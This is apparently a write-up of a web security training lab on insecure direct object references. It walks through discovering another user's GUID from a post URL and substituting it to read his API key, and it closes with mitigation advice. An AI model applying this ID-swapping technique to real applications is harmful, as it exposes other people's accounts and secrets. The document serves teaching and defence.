Level 6: User ID controlled by request parameter, with unpredictable user IDs
Objective
Solve the lab by finding the GUID for the user carlos and submitting his API key as the solution.
Explanation
This lab contains a horizontal privilege escalation vulnerability where users are identified by GUIDs (Globally Unique Identifiers) rather than predictable user IDs. While GUIDs are typically hard to guess, they can still be discovered if sensitive information such as GUIDs is exposed in the application. Once the GUID for "carlos" is identified, you can access his account and obtain his API key.
Resolution
Log in using the provided credentials:
wiener:peter.Navigate through the home page to find a post that was created by the user "carlos."
Once you find a post created by carlos, open the post and check the URL. You should see the GUID of carlos in the URL (e.g.,
user?id=<GUID>).Now, log in again as "wiener" using the provided credentials.
Change the GUID in the URL from your own GUID to the one belonging to carlos.
Once the page loads with carlos' account, locate the API key for the user "carlos."
Submit carlos' API key as the solution to complete the lab.
Mitigation
Access Control: Enforce proper server-side authorization to prevent users from accessing or modifying data that belongs to other users.
Sensitive Information Handling: Avoid exposing sensitive information like GUIDs in URLs, as they can be manipulated by attackers.
Session Management: Use session management techniques such as session tokens or access controls that prevent users from modifying their URLs to access other users' data.
Unique Identifiers: Implement more secure methods for user identification that are less predictable, such as encrypted or signed tokens.
Last updated